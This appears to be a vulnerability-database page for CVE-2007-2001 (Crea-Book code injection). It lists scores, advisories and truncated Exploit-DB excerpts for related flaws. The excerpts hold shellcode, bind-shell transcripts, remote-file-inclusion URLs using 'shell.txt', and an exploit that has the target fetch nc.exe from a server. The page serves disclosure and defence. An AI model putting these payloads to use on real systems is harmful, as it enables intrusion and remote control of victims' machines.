CVE-2007-2001
published 2007-04-12CVE-2007-2001: Multiple direct static code injection vulnerabilities in admin/configurer2.php in Crea-Book 1.0 and earlier allow remote authenticated administrators to…
PriorityP335medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
2.02%
78.5th percentile
Multiple direct static code injection vulnerabilities in admin/configurer2.php in Crea-Book 1.0 and earlier allow remote authenticated administrators to execute arbitrary PHP code via the "Fond de la page" (background color) field and other unspecified fields, which injects into config.inc.php3.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| crea-book | crea-book | <= 1.0 | — |
CVSS provenance
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vm2q-qmjf-qfhq: Multiple direct static code injection vulnerabilities in admin/configurer2
ghsa_unreviewed·2022-05-01
CVE-2007-2001 [MEDIUM] GHSA-vm2q-qmjf-qfhq: Multiple direct static code injection vulnerabilities in admin/configurer2
Multiple direct static code injection vulnerabilities in admin/configurer2.php in Crea-Book 1.0 and earlier allow remote authenticated administrators to execute arbitrary PHP code via the "Fond de la page" (background color) field and other unspecified fields, which injects into config.inc.php3.
Red Hat
python: tarfile module directory traversal
vendor_redhat·2007-08-24·CVSS 2.1
CVE-2007-4559 [LOW] CWE-22 python: tarfile module directory traversal
python: tarfile module directory traversal
Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.
A flaw was found in the Python tarfile module. Extracting a crafted TAR archive with the tarfile.extract or tarfile.extractall functions could lead to a directory traversal vulnerability, resulting in overwrite of arbitrary files.
Statement: The Red Hat Product Security has rated this issue as having a Moderate security impact, a future update may address this flaw. More information regarding issue severity can be found here: https://access.redhat.com/security/updates/classif
Red Hat
CVE-2007-2452: Heap-based buffer overflow in the visit_old_format function in locate/locate
vendor_redhat·CVSS 7.2
CVE-2007-2452 [HIGH] CVE-2007-2452: Heap-based buffer overflow in the visit_old_format function in locate/locate
Heap-based buffer overflow in the visit_old_format function in locate/locate.c in locate in GNU findutils before 4.2.31 might allow context-dependent attackers to execute arbitrary code via a long pathname in a locate database that has the old format, a different vulnerability than CVE-2001-1036.
Statement: Not vulnerable. Red Hat did not ship GNU locate in Red Hat Enterprise Linux 2.1, 3, 4, or 5. This issue does not affect the mlocate or slocate packages that are supplied with Red Hat Enterprise Linux.
Red Hat
CVE-2007-2243: OpenSSH 4
vendor_redhat·CVSS 5.0
CVE-2007-2243 [MEDIUM] CVE-2007-2243: OpenSSH 4
OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
Statement: Not vulnerable. The OpenSSH packages as shipped with Red Hat Enterprise Linux do not contain S/KEY support.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb·2012-06-14
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb·2009-09-03
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
SIDVault 2.0e - Windows Remote Buffer Overflow
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion
exploitdb·2008-07-28
CVE-2008-3368 ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion
ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion
---
#####################################################################################
#### ATutor Course Server Rfi ####
#####################################################################################
# #
#AUTHOR : IRCRASH (R3d.W0rm) #
#Discovered by : IRCRASH (R3d.W0rm) #
#Our Site : Http://IRCRASH.COM #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm #
#####################################################################################
# #
#Script Download : www.atutor.ca #
# #
#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®" #
# #
#Note : You must login , then use rfi bug ;) #
#####################################################################################
# [Rfi] #
# #
#http://Example/tools/packages/
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
awzMB 4.2 Beta 1 - Multiple Remote File Inclusions
exploitdb·2007-10-18
CVE-2007-5592 awzMB 4.2 Beta 1 - Multiple Remote File Inclusions
awzMB 4.2 Beta 1 - Multiple Remote File Inclusions
---
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : awzMB system Version 4.2 beta 1 Guestbook/Weblog/Contact
Download : http://downloads.sourceforge.net/awzmb/awzmb_4.2_beta1.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : [email protected] / [email protected]
OurForum : http://svvat.3host.biz/forum/index.php
Dork : Copyright © 2001-2007 awzMB Project
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
if (!isset($Setting[OPT_includepath])) $Sett
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB
Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb·2007-05-19
CVE-2007-2783 Rational Software Hidden Administrator 1.7 - Authentication Bypass
Rational Software Hidden Administrator 1.7 - Authentication Bypass
---
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB
GPB Bulletin Board - Multiple Remote File Inclusions
exploitdb·2007-04-24
CVE-2007-2204 GPB Bulletin Board - Multiple Remote File Inclusions
GPB Bulletin Board - Multiple Remote File Inclusions
---
#GPB bulletin board Remote file include
#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz
#D0rk : Download Script and install it in ur machine
#Exploit :
#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?
#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?
#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?
#Discovered by : ThE TiGeR
#Miro_Tiger100[at]hotmail[dot]com
# milw0rm.com [2007-04-24]
Exploit-DB
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
exploitdb·2007-04-10
CVE-2007-2001 Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
---
/=======================================\
| Advisory :: Crea-Book [fr/en] |
| Date : 2007-04-10 |
| Last update : 2007-04-10 |
| |
+-------------------------------------------------------------------------------------------------------+
| Summary : 0] Description |
| 1] Vuln#1 : Administrative Access Bypass using basic SQL injection |
| 2] Vuln#2 : PHP Code Execution Weakness |
| 3] Links & Documentation |
\-------------------------------------------------------------------------------------------------------/
DESCRIPTION
This script is old but analysing it is a good way to understand some classic security holes in web
applications. It's just a good and fast training.
Let's g0 ...
VULNERABILITY #1 : ADMINI
Exploit-DB
OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow
exploitdb·2007-03-09
CVE-2007-1365 OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow
OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/22901/info
OpenBSD is prone to a remote buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
A remote attacker can exploit this issue to execute arbitrary code with kernel-level privileges or to crash the affected computer. Successful exploits will result in a complete compromise of vulnerable computers or cause denial-of-service conditions.
#
# Description:
# OpenBSD ICMPv6 fragment remote execution PoC
#
# Author:
# Alfredo Ortega
# Mario Vilas
#
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved
from impacket import ImpactPacket
import struc
Exploit-DB
Advanced Poll 2.0.5-dev - Remote Admin Session Generator
exploitdb·2007-02-07
CVE-2007-0845 Advanced Poll 2.0.5-dev - Remote Admin Session Generator
Advanced Poll 2.0.5-dev - Remote Admin Session Generator
---
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day! KEEP IT PRIVATE 0day!
#
# date: 30/07/06
#
# diwou
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).
use strict;
use warnings;
use LWP::UserAgent;
use MD5;
my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb·2006-10-06
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
eXtremail 1.x/2.1 - Remote Format String (3)
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
eXtremail 1.x/2.1 - Remote Format String (2)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
eXtremail 1.x/2.1 - Remote Format String (1)
---
// source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' c
No writeups or analysis indexed.
2007-04-12
Published